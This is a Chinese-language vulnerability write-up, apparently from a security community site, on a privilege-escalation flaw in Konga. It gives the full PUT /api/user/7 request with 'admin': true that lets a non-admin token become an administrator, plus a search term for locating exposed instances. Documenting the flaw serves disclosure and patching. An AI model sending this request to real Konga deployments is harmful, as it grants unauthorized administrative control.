Konga 普通用户越权获取管理员权限漏洞

# Konga 普通用户越权获取管理员权限漏洞 ## 漏洞描述 Konga 普通用户通过发送特殊的请求可越权获取管理员权限 ## 漏洞影响 Konga ## 网络测绘 "konga" ## 漏洞...

Konga 普通用户越权获取管理员权限漏洞
=====================

漏洞描述
----

Konga 普通用户通过发送特殊的请求可越权获取管理员权限

漏洞影响
----

Konga

网络测绘
----

"konga"

漏洞复现
----

登录页面

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f890173aca47f229ddb724f895874bec72e821445fd56.jpg)

创建非管理员用户后登录并获取token

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f28874751a116af9212c5f070f8cb071d2d79569545c9.jpg)

发送请求包, 将token修改为刚刚获取的

```plain
PUT /api/user/7 HTTP/1.1
Host: 127.0.0.1:1337
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 241

{
  "admin": true,
  "passports": {
    "password": "1234abcd",
    "protocol": "local"
  },
  "password_confirmation": "1234abcd",
  "token": "non-administrator user token"
}
```

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f2326260834cfa2793012d2e0a10995021c0da1c3b1f3.jpg)

成功转为管理员用户

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f152524140f35ac6bba48198a46221de2e00c1997f162.jpg)

Konga 普通用户越权获取管理员权限漏洞

漏洞描述

Konga 普通用户通过发送特殊的请求可越权获取管理员权限

漏洞影响

Konga

网络测绘

"konga"

漏洞复现

登录页面

创建非管理员用户后登录并获取token

发送请求包, 将token修改为刚刚获取的

PUT /api/user/7 HTTP/1.1
Host: 127.0.0.1:1337
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 241

{
  "admin": true,
  "passports": {
    "password": "1234abcd",
    "protocol": "local"
  },
  "password_confirmation": "1234abcd",
  "token": "non-administrator user token"
}

成功转为管理员用户

发表于 2024-07-12 18:46:17
阅读 ( 2371 )
分类：Web应用

站长统计